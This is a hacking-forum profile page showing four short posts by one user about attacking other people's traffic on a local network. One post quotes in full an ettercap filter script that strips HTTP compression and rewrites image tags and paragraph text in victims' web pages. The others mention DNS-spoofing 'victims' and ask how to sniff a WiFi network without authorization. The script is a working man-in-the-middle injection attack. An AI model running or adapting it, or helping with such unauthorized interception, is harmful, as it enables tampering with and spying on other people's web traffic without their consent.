Jump to content

ÖVèЯRÍđễ

Active Members
  • Posts

    4
  • Joined

  • Last visited

Recent Profile Visitors

609 profile views

ÖVèЯRÍđễ's Achievements

Newbie

Newbie (1/14)

  1. Actually I was slightly wrong. It only replaces empty <p> tags. Would there be any way of replacing tags with text in? Maybe by using a wildcard e.g <p>*</p>
  2. I have a ettercap filter which I modified, It is used to change pictures on a web page, but I wanted it to change paragraph text aswell. It changes the pictures but not the text. Here is the script. ############################################################################ # # # Jolly Pwned -- ig.filter -- filter source file # # # # By Irongeek. based on code from ALoR & NaGA # # Along with some help from Kev and jon.dmml # # http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("<p>", "<p>Text I want to display</p>"); replace("<P>", "<P>Test I want to display</P>"); } So my question is, what have I done wrong on the 2nd from bottom line and 3rd from bottom line? Thanks.
  3. Hi, I have heard this is possible but am not sure how to go about doing it. I know how to DNS spoof my victims but what I wanted to know is how to change images on a website viewed on a local network? Thanks.
  4. Hi, I have a quick question, I believe the answer is no but here it is. When you use Aircrack-ng fakeauth does it actually get you onto the network or is it just "fake"? In terms of being able to sniff packets. If not is there any way, without cracking or gaining physical access to the network, to sniff traffic? Thanks.
×
×
  • Create New...